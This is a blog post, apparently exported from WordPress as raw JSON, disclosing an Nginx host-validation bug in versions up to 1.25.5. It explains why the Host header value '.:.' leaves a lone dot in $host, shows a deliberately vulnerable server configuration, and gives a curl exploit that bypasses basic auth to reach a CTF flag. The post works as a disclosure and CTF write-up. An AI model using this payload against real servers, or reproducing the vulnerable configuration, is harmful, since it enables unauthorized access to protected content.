# Nginx =< 1.25.5 $host variable validation bug<\/p>\n
## Intro:<\/p>\n
In the “Host” header sent to Nginx web server you can’t just insert a dot or something like that, because a filtering rules exists there.
The ngx_http_validate_host function is responsible for filtering (https:\/\/github.com\/nginx\/nginx\/blob\/master\/src\/http\/ngx_http_request.c#L2145).<\/p>\n
## What it validates:<\/p>\n
+ \ufeff\ufefftwo dots in a row are not allowed
+ colon and everything after it are stripped off
+ \ufeff\ufeffif “Host” header starts with “[“, then after “]” everything is deleted
+ \ufeff\ufeffpath separators are not allowed
+ \ufeff\ufeffcannot send chars \u2264 0x20 and == 0x7f
+ \ufeff\ufeffif there is a dot at the end, it is removed
+ \ufeff\ufeffif after all deletions the host length is zero, error occurs<\/p>\n
## The bug itself: <\/p>\n
dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted.<\/p>\n
So, if “Host” header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can’t be done in the normal conditions.<\/p>\n
## Vulnerable Nginx server configuration example:<\/p>\n
server {
root \/sites\/$host;
index index.html;
server_name _;<\/p>\n
location \/ {
try_files $uri $uri\/ =404;
}
}<\/p>\n
server {
server_name “”;<\/p>\n
location \/ {
return 418 “I’m a teapot.”;
}
}<\/p>\n
server {
root \/sites\/protected-host.example.com;
index flag.html;
server_name protected-host.example.com;
auth_basic “Protected File Storage”;
auth_basic_user_file \/.htpasswd;<\/p>\n
location \/ {
try_files $uri $uri\/ =404;
}
}<\/p>\n
## Exploit (unauthorized access to password-protected host in this case):<\/p>\n
curl -H “Host: .:.” http:\/\/protected-host.example.com\/protected-host.example.com\/flag.html<\/p>\n
P.S.
The bug was sent to security-alert@nginx.org, but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.<\/p>\n","protected":false},"excerpt":{"rendered":"
# Nginx =< 1.25.5 $host variable validation bug ## Intro: In the “Host” header sent to Nginx web server you can’t just insert a dot or something like that, because a filtering rules exists there. The ngx_http_validate_host function is responsible for filtering (https:\/\/github.com\/nginx\/nginx\/blob\/master\/src\/http\/ngx_http_request.c#L2145). ## What it validates: + \ufeff\ufefftwo dots in a row are not …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56427","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56427"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56427\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56427"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}